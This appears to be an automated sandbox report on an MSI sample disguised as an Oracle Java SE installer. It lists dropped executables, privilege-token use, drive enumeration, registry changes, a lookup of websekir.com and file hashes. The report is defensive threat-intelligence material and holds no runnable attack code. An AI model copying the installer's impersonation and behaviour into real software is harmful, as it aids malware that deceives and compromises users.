Analysis Overview
SHA256
f8cf786235acc09140f9f2b21f61d2f2886f2592afb814b29bffd5550be849e9
Threat Level: Likely malicious
The file 4c11285fc4be4ffa97a866fbc13bbd83_JaffaCakes118 was found to be: Likely malicious.
Malicious Activity Summary
Command and Scripting Interpreter: PowerShell
Possible privilege escalation attempt
Modifies file permissions
Enumerates connected drives
Blocklisted process makes network request
File and Directory Permissions Modification: Windows File and Directory Permissions Modification
Executes dropped EXE
Drops file in Program Files directory
Drops file in Windows directory
Loads dropped DLL
System Location Discovery: System Language Discovery
Event Triggered Execution: Installer Packages
Suspicious use of FindShellTrayWindow
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Kills process with taskkill
Suspicious use of SetWindowsHookEx
Modifies registry class
Modifies data under HKEY_USERS
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-16 08:21
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-16 08:21
Reported
2024-10-16 08:24
Platform
win7-20240729-en
Max time kernel
142s
Max time network
62s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-synch-l1-2-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-multibyte-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\msvcp140.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\libcurl.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\libssl-1_1.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\patch_service.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-file-l2-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-convert-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-math-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-string-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-processthreads-l1-1-1.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-conio-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-time-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-utility-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\libcrypto-1_1-x64.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\setup.bat | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-file-l1-2-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-localization-l1-2-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-environment-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-stdio-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-locale-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-filesystem-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-heap-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\vcruntime140.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\vcruntime140_1.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-process-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\SyncMonitor.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-timezone-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-private-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-runtime-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe | C:\Windows\system32\msiexec.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Installer\f77c948.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\f77c948.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\f77c949.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSICD4D.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\wix{C3AE88D3-0A1C-4764-885E-6B3F16F7DD48}.SchedServiceConfig.rmi | C:\Windows\syswow64\MsiExec.exe | N/A |
| File created | C:\Windows\Installer\f77c94b.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\{C3AE88D3-0A1C-4764-885E-6B3F16F7DD48}\Logo.ico | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\f77c949.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSICC41.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSICC51.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\{C3AE88D3-0A1C-4764-885E-6B3F16F7DD48}\Logo.ico | C:\Windows\system32\msiexec.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\patch_service.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe | N/A |
Loads dropped DLL
Event Triggered Execution: Installer Packages
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2E | C:\Windows\system32\msiexec.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E | C:\Windows\system32\msiexec.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\InstanceType = "0" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\4283AD5241F3747428B68F1D87E32188 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\4283AD5241F3747428B68F1D87E32188\3D88EA3CC1A0467488E5B6F3617FDD84 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\SourceList | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\SourceList\Media | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\AdvertiseFlags = "388" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\AuthorizedLUAApp = "0" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\SourceList\Net | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\Clients = 3a0000000000 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\3D88EA3CC1A0467488E5B6F3617FDD84\ProductFeature | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\Language = "1033" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\ProductIcon = "C:\\Windows\\Installer\\{C3AE88D3-0A1C-4764-885E-6B3F16F7DD48}\\Logo.ico" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\SourceList\PackageName = "4c11285fc4be4ffa97a866fbc13bbd83_JaffaCakes118.msi" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\SourceList\Media\1 = ";" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\PackageCode = "9CC889D6EA63DC94DA730B4082DA0DA1" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\Assignment = "1" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\Version = "134217999" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\DeploymentFlags = "3" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\3D88EA3CC1A0467488E5B6F3617FDD84 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\ProductName = "Oracle Java SE" | C:\Windows\system32\msiexec.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreateTokenPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeMachineAccountPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreatePermanentPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeChangeNotifyPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSyncAgentPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeEnableDelegationPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeImpersonatePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreateGlobalPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\msiexec.exe
msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\4c11285fc4be4ffa97a866fbc13bbd83_JaffaCakes118.msi
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding F846D7892EC1A7F3C05386819156FEF4
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding A7B7C43405B7DE54D4C7E4575FA51208 M Global\MSI0000
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\patch_service.exe
"C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\patch_service.exe"
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe
"C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | repository.certum.pl | udp |
| GB | 2.18.63.21:80 | repository.certum.pl | tcp |
| US | 8.8.8.8:53 | websekir.com | udp |
| N/A | 127.0.0.1:49425 | tcp | |
| N/A | 127.0.0.1:49428 | tcp | |
| N/A | 127.0.0.1:49431 | tcp | |
| N/A | 127.0.0.1:49434 | tcp | |
| N/A | 127.0.0.1:49437 | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\CabC812.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Temp\TarC824.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 8db417db00fe3cf55e2a3bfd7706c920 |
| SHA1 | fbfae63b218940b237ee915cc406bc98ad33bdab |
| SHA256 | e815c0884eeda37b3ef35d1783284c70ed02673dba3956eb8a007caaae9e8f65 |
| SHA512 | 86e7137c74e7522fb5a13b4f8473d8fbd57d90d3da6b54b0d0fc42d449f6f59887b8ad48b29779bbf3b3a5e89219bf874897aeac64a2718c539c38c6004f693c |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6525274CBC2077D43D7D17A33C868C4F
| MD5 | d5e98140c51869fc462c8975620faa78 |
| SHA1 | 07e032e020b72c3f192f0628a2593a19a70f069e |
| SHA256 | 5c58468d55f58e497e743982d2b50010b6d165374acf83a7d4a32db768c4408e |
| SHA512 | 9bd164cc4b9ef07386762d3775c6d9528b82d4a9dc508c3040104b8d41cfec52eb0b7e6f8dc47c5021ce2fe3ca542c4ae2b54fd02d76b0eabd9724484621a105 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6525274CBC2077D43D7D17A33C868C4F
| MD5 | aecbc3ea574af22e388ebfb340db35e9 |
| SHA1 | 3d00105e58eed12a2bf2340efe22e6a3a47d578a |
| SHA256 | 5866d50e054c8a7cfefa93ad2ddfc27a3684dd303726ac5e52ab3afb43360824 |
| SHA512 | 45a72f343c06b93497b5f0648c1cd3767eef3488eef9d52522c3f9540f08de7779d2572ee8b5deb255ac1c6416c395fcd88d8b3edb7b18c015d52e89aad157d4 |
C:\Windows\Installer\MSICC51.tmp
| MD5 | a3ae5d86ecf38db9427359ea37a5f646 |
| SHA1 | eb4cb5ff520717038adadcc5e1ef8f7c24b27a90 |
| SHA256 | c8d190d5be1efd2d52f72a72ae9dfa3940ab3faceb626405959349654fe18b74 |
| SHA512 | 96ecb3bc00848eeb2836e289ef7b7b2607d30790ffd1ae0e0acfc2e14f26a991c6e728b8dc67280426e478c70231f9e13f514e52c8ce7d956c1fad0e322d98e0 |
\Program Files (x86)\Sun Technology Network\Oracle Java SE\patch_service.exe
| MD5 | a27bdbc102aa90a99bc5538bb271b4d3 |
| SHA1 | eb18ea9eee793aa76eab49feea0e6490c4ded61e |
| SHA256 | e85b4b2991b3772ab7bfaf0012fe5dfd754fd0c3661466e556b20f5ca8f2b4de |
| SHA512 | cc0cbdc74b419a77f8250cd80f68af5b227383ee904707187b8971d3ed478cb80edcf7ab27390e34be65b599fb214925577afecc6e82d41db9000c50f71da421 |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\MSVCP140.dll
| MD5 | 9dda681b0406c3575e666f52cbde4f80 |
| SHA1 | 1951c5b2c689534cdc2fbfbc14abbf9600a66086 |
| SHA256 | 1ecd899f18b58a7915069e17582b8bf9f491a907c3fdf22b1ba1cbb2727b69b3 |
| SHA512 | 753d0af201d5c91b50e7d1ed54f44ee3c336f8124ba7a5e86b53836df520eb2733b725b877f83fda6a9a7768379b5f6fafa0bd3890766b4188ebd337272e9512 |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\VCRUNTIME140.dll
| MD5 | e008fbfdea1bf873f3d94d74c1cf7935 |
| SHA1 | 2a2af5e9084e7b55cdd5d01df342b02c1917573c |
| SHA256 | 678f9d715220512a823ca45d7e8545a1288728d8d47243e072e17049441cdd2b |
| SHA512 | 145acb67ab06dc90e5c7ed89623a339f595998af683bf47d665ffa23b05f9b87016b3ae5777c2c45f53b91a757e510b0f5aa5a9b908d79df3d566b2307d9d3d0 |
